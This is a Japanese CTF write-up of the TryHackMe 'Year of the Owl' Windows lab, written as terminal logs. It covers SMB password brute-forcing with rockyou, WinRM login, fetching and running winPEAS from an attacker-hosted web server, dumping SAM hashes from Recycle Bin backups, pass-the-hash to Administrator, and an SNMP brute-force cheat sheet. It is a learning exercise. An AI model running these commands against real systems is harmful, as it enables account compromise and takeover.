nxc smb <MACHINE-IP> -u Jareth -p /usr/share/wordlists/rockyou.txt
実際に試しました。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u Jareth -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:123456 STATUS_LOGON_FAILURE
......
......
......
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:natalie STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:cuteako STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:javier STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:789456123 STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:123654 STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [+] year-of-the-owl\Jareth:[cracked_password]
すると、なんとJarethのパスワードを当てることに成功しました。
実際に、Sambaに対して使えるのかを検証します。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u Jareth -p [cracked_password] --shares
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [+] year-of-the-owl\Jareth:sarah
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Enumerated shares
SMB [target_ip] 445 YEAR-OF-THE-OWL Share Permissions Remark
SMB [target_ip] 445 YEAR-OF-THE-OWL ----- ----------- ------
SMB [target_ip] 445 YEAR-OF-THE-OWL ADMIN$ Remote Admin
SMB [target_ip] 445 YEAR-OF-THE-OWL C$ Default share
SMB [target_ip] 445 YEAR-OF-THE-OWL IPC$ READ Remote IPC
また、winrmも検証してみます。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc winrm [target_ip] -u Jareth -p [cracked_password]
WINRM [target_ip] 5985 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM [target_ip] 5985 YEAR-OF-THE-OWL [+] year-of-the-owl\Jareth:[cracked_password] (Pwn3d!)
すると、アクセスが可能になっていました。
実際にアクセスを試みます。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ evil-winrm -i [target_ip] -u Jareth -p [cracked_password]
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Jareth\Documents>
すると、ログインに成功しました。
C:\Users\Jareth\Desktopの中に、user.txtが入っているため、User Flagを取得できます。
*Evil-WinRM* PS C:\Users\Jareth\Desktop> dir
Directory: C:\Users\Jareth\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:21 AM 80 user.txt
*Evil-WinRM* PS C:\Users\Jareth\Desktop> cat user.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXX}
User Flag
Answer: THM{XXXXXXXXXXXXXXXXXXXXXXXXXXX}
Privilege Escalation
実際にこのアカウントがどのような権限なのかを確認します。
*Evil-WinRM* PS C:\Users\Jareth\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== =============================================
year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
特に何もなさそうなので、winpeasで調べてみます。
┌──(rikuxx㉿kali)-[/usr/share/peass]
└─$ winpeas
> peass ~ Privilege Escalation Awesome Scripts SUITE
/usr/share/peass/winpeas
├── winPEAS.bat
├── winPEAS.ps1
├── winPEASany.exe
├── winPEASany_ofs.exe
├── winPEASx64.exe
├── winPEASx64_ofs.exe
├── winPEASx86.exe
└── winPEASx86_ofs.exe
┌──(rikuxx㉿kali)-[/usr/share/peass/winpeas]
└─$ ls
winPEAS.bat winPEAS.ps1 winPEASany.exe winPEASany_ofs.exe winPEASx64.exe winPEASx64_ofs.exe winPEASx86.exe winPEASx86_ofs.exe
┌──(rikuxx㉿kali)-[/usr/share/peass/winpeas]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
[target_ip] - - [06/May/2026 00:42:56] "GET /winPEASx64.exe HTTP/1.1" 200 -
*Evil-WinRM* PS C:\Users\Jareth> iwr -uri http://<自分のKaliのIP>/winPEASx64.exe -OutFile wp.exe
*Evil-WinRM* PS C:\Users\Jareth> .\wp.exe
ところが、長すぎるので、注目するところだけ見ました。
ただ、よくわからないため、もう一度、他のwriteupを見ました。
どうやら、調べ方が悪かったっぽいです。
管理者権限がないと他のユーザーのSIDを見ることはできないので、自分のSIDに注目みることにします。
*Evil-WinRM* PS C:\Users\Jareth> whoami /all | Select-String -Pattern "jareth" -Context 2,0
User Name SID
====================== =============================================
> year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
ありました。
また、このラボは題材としてゴミ箱をテーマにしているそうで、実際に見てみます。
*Evil-WinRM* PS C:\Users\Jareth> cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> dir
Directory: C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
これ、多分普通に見つかりません。多分、相当むずいと思います。
ダウンロードします。
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> copy .\sam.bak C:\Users\Jareth\sam.bak
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> copy .\system.bak C:\Users\Jareth\system.bak
*Evil-WinRM* PS C:\Users\Jareth> download ./system.bak
Info: Downloading C:\Users\Jareth\system.bak to system.bak
Info: Download successful!
*Evil-WinRM* PS C:\Users\Jareth> download ./sam.bak
Info: Downloading C:\Users\Jareth\sam.bak to sam.bak
実際に、impacket-secretdumpでNTLMハッシュを抽出することが可能でした。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ impacket-secretsdump -sam sam.bak -system system.bak LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:[AdministratorのNTLMハッシュ]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435
実際に、そのNTMLハッシュを使用することで、Administratorでアクセス可能でした。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ evil-winrm -i [target_ip] -u Administrator -H [AdministratorのLMハッシュ]
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
C:\Users\Administrator\Desktopの中にadmin.txtがあり、Admin Flagを取得することができます。
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:19 AM 80 admin.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type admin.txt
THM{YYYYYYYYYYYYYYYYYYYYYYYYYYYYYY}
Admin Flag
Answer: THM{YYYYYYYYYYYYYYYYYYYYYYYYYYYYYY}
終わり
今回は、Active Direcotoryの問題の中でもかなり複雑なものを解きました。普通にむずかったです。
特に、SNMPや権限昇格するための調べ方は非常にCTFっぽい匂いがありました。
結果として、面白かったです。
Tips
SNMPって何ぞや?
SNMP (Simple Network Management Protocol) は、ルータ、スイッチ、サーバなどTCP/IPネットワークに接続された通信機器に対し、ネットワーク経由で監視、制御するためのアプリケーション層プロトコルです。SNMPを利用することにより、導入したネットワーク機器を監視することができるので、ネットワークに障害が発生した場合にどの機器に障害が発生したのかをすぐに突き止められるなど、迅速な障害復旧に役立ちます。
引用: https://www.infraexpert.com/study/tcpip21.html#google_vignette
このようなUDPプロトコルが存在するそうです。
SNMPコミュニティとは?
SNMPコミュニティとは、SNMPで管理するネットワークシステムの範囲のことです。SNMPマネージャとSNMPエージェントとの間で、同じコミュニティ名にすることで情報を共有することができます。監視対象ごとに異なるコミュニティ名を設定することにより、効率的な管理とアクセス権限の分離を実現できます。
引用: https://www.infraexpert.com/study/tcpip21.5.html
どうやら、SNMPにはコミュニティという概念があり、それを名前で命名しているそうです。
SNMPプロトコルにおけるスキャン手法とチートシート
SNMPプロトコルをスキャンする上で以下のようなツールを使用します。
このツールはいわゆるPort Scanで言うNMAPと同じようなものでスキャンし、ログをユーザーが調整可能な送信時間でsysDescr値に対するSNMPリクエストを非同期的に送信し、デバイス上で実行されているソフトウェアの説明を提供する応答をログに記録するものです。
このツールは、Gobusterやenum4linuxようなもので、公開SNMPコミュニティ文字列を使用してターゲットホストをスキャンします
簡単な流れ
-
onesixtyoneでSNMPプロトコルがどのような挙動を示すか調べる - SNMPコミュニティ名のワードリストファイルがあれば、それを総当たりとして使用する
- もしSNMPコミュニティ名を特定できたら、
snmpcheckで具体的に調べる - ユーザー名を収集することができる
チートシート
SNMPコミュニティに対する総当たり攻撃
$ onesixtyone -c <SNMPコミュニティ名のワードリストファイル> [Host]
特定したSNMPコミュニティ名をもとに詳細を調べてくれるコマンド
$ snmp-check [Host/IP] -c <特定したSNMPコミュニティ名>